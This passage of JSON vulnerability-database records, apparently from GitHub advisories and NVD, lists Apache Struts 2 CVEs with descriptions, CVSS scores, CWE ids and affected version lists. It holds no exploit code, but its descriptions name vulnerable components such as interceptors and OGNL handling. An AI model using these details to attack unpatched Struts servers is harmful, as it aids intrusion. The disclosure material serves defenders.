of execution context. It can be used to manipulate Struts' internals or can be used to affect container's settings. Applying better regex which includes pattern to exclude request parameters trying to use top object. This issue was patched in Struts 2.3.24.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-14T03:15:08", "type": "github", "title": "Special top object can be used to access Struts' internals", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5209"], "modified": "2023-02-01T05:04:27", "id": "GHSA-4QGJ-9MVG-3929", "href": "https://github.com/advisories/GHSA-4qgj-9mvg-3929", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2023-09-28T05:29:50", "description": "Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.", "cvss3": {}, "published": "2013-07-16T18:55:00", "type": "cve", "title": "CVE-2013-2134", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2018-11-23T15:54:00", "cpe": [], "id": "CVE-2013-2134", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2134", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-09-28T05:23:43", "description": "Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2013-07-10T19:55:00", "type": "cve", "title": "CVE-2013-2115", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2020-09-24T13:28:00", "cpe": ["cpe:/a:apache:struts:2.3.14.1"], "id": "CVE-2013-2115", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2115", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-29T10:45:37", "description": "CookieInterceptor in Apache Struts 2.x before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and modify session state via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0113.", "cvss3": {}, "published": "2014-05-08T10:55:00", "type": "cve", "title": "CVE-2014-0116", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0113", "CVE-2014-0116"], "modified": "2019-08-12T21:15:00", "cpe": ["cpe:/a:apache:struts:2.3.14.3", "cpe:/a:apache:struts:2.1.4", "cpe:/a:apache:struts:2.1.2", "cpe:/a:apache:struts:2.3.4", "cpe:/a:apache:struts:2.3.15.2", "cpe:/a:apache:struts:2.3.15.3", "cpe:/a:apache:struts:2.3.15", "cpe:/a:apache:struts:2.3.16.2", "cpe:/a:apache:struts:2.1.6", "cpe:/a:apache:struts:2.0.4", "cpe:/a:apache:struts:2.3.1", "cpe:/a:apache:struts:2.3.14.2", "cpe:/a:apache:struts:2.0.6", "cpe:/a:apache:struts:2.2.1.1", 
"cpe:/a:apache:struts:2.3.15.1", "cpe:/a:apache:struts:2.2.3.1", "cpe:/a:apache:struts:2.0.0", "cpe:/a:apache:struts:2.3.3", "cpe:/a:apache:struts:2.0.3", "cpe:/a:apache:struts:2.3.8", "cpe:/a:apache:struts:2.0.9", "cpe:/a:apache:struts:2.0.7", "cpe:/a:apache:struts:2.1.0", "cpe:/a:apache:struts:2.3.12", "cpe:/a:apache:struts:2.0.11.2", "cpe:/a:apache:struts:2.0.13", "cpe:/a:apache:struts:2.0.10", "cpe:/a:apache:struts:2.1.3", "cpe:/a:apache:struts:2.3.14.1", "cpe:/a:apache:struts:2.3.16", "cpe:/a:apache:struts:2.3.7", "cpe:/a:apache:struts:2.0.8", "cpe:/a:apache:struts:2.3.16.1", "cpe:/a:apache:struts:2.0.12", "cpe:/a:apache:struts:2.0.5", "cpe:/a:apache:struts:2.1.5", "cpe:/a:apache:struts:2.3.1.2", "cpe:/a:apache:struts:2.2.1", "cpe:/a:apache:struts:2.3.1.1", "cpe:/a:apache:struts:2.1.1", "cpe:/a:apache:struts:2.0.14", "cpe:/a:apache:struts:2.0.11.1", "cpe:/a:apache:struts:2.3.4.1", "cpe:/a:apache:struts:2.0.11", "cpe:/a:apache:struts:2.0.1", "cpe:/a:apache:struts:2.2.3", "cpe:/a:apache:struts:2.1.8", "cpe:/a:apache:struts:2.3.14", "cpe:/a:apache:struts:2.1.8.1", "cpe:/a:apache:struts:2.0.2"], "id": "CVE-2014-0116", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0116", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.5:*:*:*:*:*:*:*", 
"cpe:2.3:a:apache:struts:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.15.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.13:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-29T10:46:43", "description": "ParametersInterceptor in Apache Struts before 2.3.20 does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via a crafted request. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.", "cvss3": {}, "published": "2014-04-29T10:37:00", "type": "cve", "title": "CVE-2014-0112", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0112"], "modified": "2019-08-12T21:15:00", "cpe": [], "id": "CVE-2014-0112", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0112", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-09-29T10:48:40", "description": "CookieInterceptor in Apache Struts before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via a crafted request. 
NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.", "cvss3": {}, "published": "2014-04-29T10:37:00", "type": "cve", "title": "CVE-2014-0113", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0113"], "modified": "2019-08-12T21:15:00", "cpe": [], "id": "CVE-2014-0113", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0113", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-23T14:19:29", "description": "In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-09-20T17:29:00", "type": "cve", "title": "CVE-2017-12611", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611"], "modified": "2019-08-12T21:15:00", "id": "CVE-2017-12611", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12611", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2023-06-06T14:52:56", "description": "Apache Struts 2.3.1.2 and earlier, 2.3.19-2.3.23, provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, 
ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an \"easy work-around in existing apps by configuring the interceptor.\"", "cvss3": {}, "published": "2012-01-08T17:55:00", "type": "cve", "title": "CVE-2011-5057", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-5057"], "modified": "2019-08-12T21:15:00", "cpe": [], "id": "CVE-2011-5057", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-5057", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2023-06-03T14:34:40", "description": "Apache Struts 2 before 2.3.29 and 2.5.x before 2.5.1 allow attackers to have unspecified impact via vectors related to improper action name clean up.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-03T15:59:00", "type": "cve", "title": "CVE-2016-4436", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 
"LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4436"], "modified": "2017-08-09T01:29:00", "id": "CVE-2016-4436", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4436", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2023-08-13T04:10:47", "description": "The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.", "cvss3": {}, "published": "2012-09-05T23:55:00", "type": "cve", "title": "CVE-2012-4386", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4386"], "modified": "2017-08-29T01:32:00", "id": "CVE-2012-4386", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4386", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2023-09-09T10:42:49", "description": "Apache Struts 2.x before 2.3.24.1 allows remote attackers to manipulate Struts internals, alter user sessions, or affect container settings via vectors involving a top object.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-08-29T15:29:00", "type": "cve", "title": "CVE-2015-5209", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5209"], "modified": "2018-07-01T01:29:00", "id": "CVE-2015-5209", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5209", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, 
{"lastseen": "2023-09-12T09:19:23", "description": "Apache Struts 2.0.0 through 2.3.15.1 allows remote attackers to bypass access controls via a crafted action: prefix.", "cvss3": {}, "published": "2013-09-30T21:55:00", "type": "cve", "title": "CVE-2013-4310", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 
8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4310"], "modified": "2014-05-05T05:25:00", "id": "CVE-2013-4310", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4310", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, 
{"lastseen": "2023-08-16T03:21:20", "description": "Apache Struts 2.0.0 through 2.3.x before 2.3.20 uses predictable <s:token/> values, which allows remote attackers to bypass the CSRF protection mechanism.", "cvss3": {}, "published": "2014-12-10T15:59:00", "type": "cve", "title": "CVE-2014-7809", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7809"], "modified": "2018-10-09T19:53:00", "id": "CVE-2014-7809", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7809", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2023-06-03T14:33:30", "description": "Cross-site scripting (XSS) vulnerability in the URLDecoder function in JRE before 1.8, as used in Apache Struts 2.x before 2.3.28, when using a single byte page encoding, allows remote attackers to inject arbitrary web script or HTML via multi-byte characters in a url-encoded parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": 
"NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-04-12T16:59:00", "type": "cve", "title": "CVE-2016-4003", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4003"], "modified": "2018-11-23T16:21:00", "cpe": ["cpe:/a:apache:struts:2.3.24.1"], "id": "CVE-2016-4003", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4003", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.24.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-09-21T00:50:04", "description": "Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.", "cvss3": {}, "published": "2011-05-13T17:05:00", "type": "cve", "title": "CVE-2011-1772", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1772"], "modified": "2012-01-19T03:57:00", "cpe": ["cpe:/a:apache:struts:2.0.8", "cpe:/a:apache:struts:2.0.12", "cpe:/a:apache:struts:2.1.8.1", "cpe:/a:apache:struts:2.0.11", "cpe:/a:apache:struts:2.0.9", "cpe:/a:apache:struts:2.0.11.1", "cpe:/a:apache:struts:2.0.7", "cpe:/a:apache:struts:2.1.4", "cpe:/a:apache:struts:2.1.1", "cpe:/a:apache:struts:2.1.5", "cpe:/a:apache:struts:2.0.10", "cpe:/a:apache:struts:2.2.1.1", "cpe:/a:apache:struts:2.1.2", "cpe:/a:apache:struts:2.0.4", "cpe:/a:apache:struts:2.1.3", "cpe:/a:apache:struts:2.0.5", "cpe:/a:apache:struts:2.0.14", "cpe:/a:opensymphony:xwork:*", "cpe:/a:apache:struts:2.0.6", "cpe:/a:apache:struts:2.1.8", "cpe:/a:opensymphony:webwork:*", "cpe:/a:apache:struts:2.2.1", "cpe:/a:apache:struts:2.0.2", "cpe:/a:apache:struts:2.1.0", "cpe:/a:apache:struts:2.0.13", "cpe:/a:apache:struts:2.0.0", "cpe:/a:apache:struts:2.0.1", "cpe:/a:apache:struts:2.1.6", "cpe:/a:apache:struts:2.0.3", "cpe:/a:apache:struts:2.0.11.2"], "id": "CVE-2011-1772", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1772", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:apache:struts:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*", 
